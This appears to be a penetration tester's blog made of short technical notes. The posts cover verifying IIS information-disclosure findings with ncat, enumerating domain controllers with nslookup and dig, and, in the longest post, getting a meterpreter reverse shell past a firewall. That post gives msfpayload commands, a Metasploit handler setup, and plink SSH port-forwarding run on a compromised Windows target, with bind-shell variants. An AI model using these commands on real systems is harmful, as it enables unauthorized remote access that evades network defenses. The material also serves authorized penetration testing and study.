Quick notes – How to Verify IIS Findings

06/03/2012 § 1 Comment

How to verify IIS findings (Requirement: Nmap tool):

Microsoft IIS Authentication Method Disclosure

Verifying HTTPS (*For http just remove “–ssl ” from ncat command below )

# ncat --ssl -vv ip.address port
GET / HTTP/1.1
Host: iis-server
Authorization: Negotiate TlRMTVNTUAABAAAAB4IAoAAAAAAAAAAAAAAAAAAAAAA=

OR

GET / HTTP/1.1
Host: iis-server
Authorization: Basic cTFraTk6ZDA5a2xt

---> RESPONSE:
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Sun, 03 Jun 2012 15:36:28 GMT
WWW-Authenticate: Negotiate TlRMTVNTUAACAAAAGgAaADgAAAAFgoKiSm+zVQ+ZeUsAAAAAAAAAAHwAfABSAAAABQCTCAAAAA9NAEsAUwAtAE4ATwBUAC0AVwBFAEIAMAAxAAIAGgBNAEsAUwAtAE4ATwBUAC0AVwBFAEIAMAAxAAEAGgBNAEsAUwAtAE4ATwBUAC0AVwBFAEIAMAAxAAQAGgBtAGsAcwAtAG4AbwB0AC0AdwBlAGIAMAAxAAMAGgBtAGsAcwAtAG4AbwB0AC0AdwBlAGIAMAAxAAAAAAA=
Content-Length: 24
Content-Type: text/html

References:
Nexpose
CVE
BID

Microsoft IIS Internal IP Address Leak

Verifying HTTPS (*For http just remove “–ssl ” from ncat command below)

#########################################
# Content-Location Internal IP Leak
#########################################

ncat --ssl -vv ip.address port
HEAD / HTTP/1.0

OR

ncat --ssl -vv ip.address port
GET / HTTP/1.0

#########################################
# WEBDAV PROPFIND/SEARCH Internal IP Leak
#########################################

ncat --ssl -vv ip.address port
PROPFIND / HTTP/1.1
Host:
Content-Length: 0

References:
Nexpose
BID

 

Microsoft IIS ISAPI Services are Enabled

Verifying HTTPS (*For http just remove “–ssl ” from ncat command below)


#########################################
# Test for the following extensions (IDA, 
# IDC, IDQ, HTR, HTW, and PRINTER)
#########################################
ncat --ssl -vv ip.address port
GET /x.printer HTTP/1.0

-----> RESPONSE
HTTP/1.1 500 13
Server: Microsoft-IIS/5.0
Date: Sun, 03 Jun 2012 16:02:30 GMT
X-Powered-By: ASP.NET
Content-Type: text/html
<b>Error in web printer install.</b>

References:
Nexpose

Microsoft IIS Unprotected CNF Files Information Disclosure

Verifying HTTP (*For https just add “–ssl ” from ncat command below)


#########################################
# Test the for the following files:
# access.cnf, svcacl.cnf, writeto.cnf, 
# service.cnf, botinfs.cnf, bots.cnf, 
# linkinfo.cnf and services.cnf
#########################################

ncat --ssl -vv ip.address port
GET /_vti_pvt/access.cnf HTTP/1.0

---> RESPONSE:
HTTP/1.1 200 OK
Content-Length: 121
Content-Type: text/plain
Last-Modified: Sat, 11 Mar 2006 07:59:56 GMT
Accept-Ranges: bytes
ETag: "fa6d53c9e144c61:2184"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 03 Jun 2012 16:07:16 GMT
Connection: close

vti_encoding:SR|utf8-nl
RealmName:exp-rom-web-01
PasswordDir:c:\\inetpub\\wwwroot\\_vti_pvt
InheritPermissions:false

References:

Nexpose
SecuritySpace

Quick notes – Enumerate Domain Controllers via nslookup

12/16/2011 § Leave a comment

Scenario:

Let’s say you know the domain name but you would like to enumerate all domain controllers.

domain: hacking.lab.local

# Linux Backtrack 5 R1 (attacker machine) 

  1. Open your linux shell

Using Nslookup

nslookup
set type=srv
_ldap._tcp.dc._msdcs.hacking.lab.local

Using Dig (Display a list of domain controllers )

dig SRV _ldap._tcp.dc._msdcs.hacking.lab.local | egrep -v '(;;)'|cut -d" " -f8 | awk NF

References:

Verify DNS registration for DC using nslookuphttp://technet.microsoft.com/en-us/library/cc738991%28WS.10%29.aspx

Get Domain Admins Script (GDA.bat)https://github.com/nullbind/Other-Projects/tree/master/GDA

Quick notes – Get a meterpreter reverse shell through SSH tunnel

12/03/2011 § Leave a comment

Scenario:

Let’s say you are able to upload binaries to your target machine (via webshell, black magic, or bribes).

When you try to upload your meterpreter payload and runs it the firewall kills your session.

Below is a nice trick that you can pull in order to bypass evil firewalls or restrictive rules (keep in mind that sometimes you may need to change the port of your SSH server from 22 to something like 80 or 443).

In my humble opinion, meterpreter shells should never be dropped.

# Linux Backtrack 5 R1 (attacker machine) 

  1. Fire up your SSH server
  2. Generate your meterpreter payload :
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msf.exe
  1. Drop msf.exe on your target
  2. Drop plink.exe on your target (plink version from quest putty)
  3. Set up a msf handler
color false
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.1.1
set lport 4444
set exitonsession false
exploit -j
  • Note: Use 127.0.1.1 instead of 127.0.0.1 (otherwise you will have a lot of problems)

On Mac you will have to set up an alias for lo interface:

# ifconfig lo0 alias 127.0.1.1

# Windows (target machine)

  1. Connecting to the ssh server and setting up a port forwarding:
plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444
  1. Start msf.exe

You should get a meterpreter reverse shell.

References:

Resilient SSH Tunneled Meterpreter Sessionhttp://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Quest PuTTYhttp://rc.quest.com/topics/putty/readme/#plinkopt

Dirty notes:

Reverse:


##attacker##
# I had issues with reverse_https, so I highly recommend reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msfrev.exe

## target ###

plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444

Bind:


##attacker###

msfpayload windows/meterpreter/bind_tcp RHOST=127.0.1.1 LPORT=4444 X > /path/msfbind.exe

##target##

plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -R 127.0.1.1:4444:127.0.1.1:4444

ready for the pain?

03/23/2011 § 4 Comments

Happy to announce my debut!

ping hdesser.wordpress.com
PING lb.wordpress.com (72.233.2.58): 56 data bytes
64 bytes from 72.233.2.58: icmp_seq=0 ttl=52 time=117.765 ms
64 bytes from 72.233.2.58: icmp_seq=1 ttl=52 time=122.476 ms
64 bytes from 72.233.2.58: icmp_seq=2 ttl=52 time=111.617 ms
64 bytes from 72.233.2.58: icmp_seq=3 ttl=52 time=110.627 ms
64 bytes from 72.233.2.58: icmp_seq=4 ttl=52 time=115.772 ms
64 bytes from 72.233.2.58: icmp_seq=5 ttl=52 time=138.754 ms
^C
--- lb.wordpress.com ping statistics ---
6 packets transmitted, 6 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 110.627/119.502/138.754/9.464 ms

Finally, I will have a place to vomit my ideas.

Before I begin, few things you might need to know about me:

A proud offsec certified student (OSWP/OSCP/OSCE), corelan’s student, and infosec enthusiast by heart.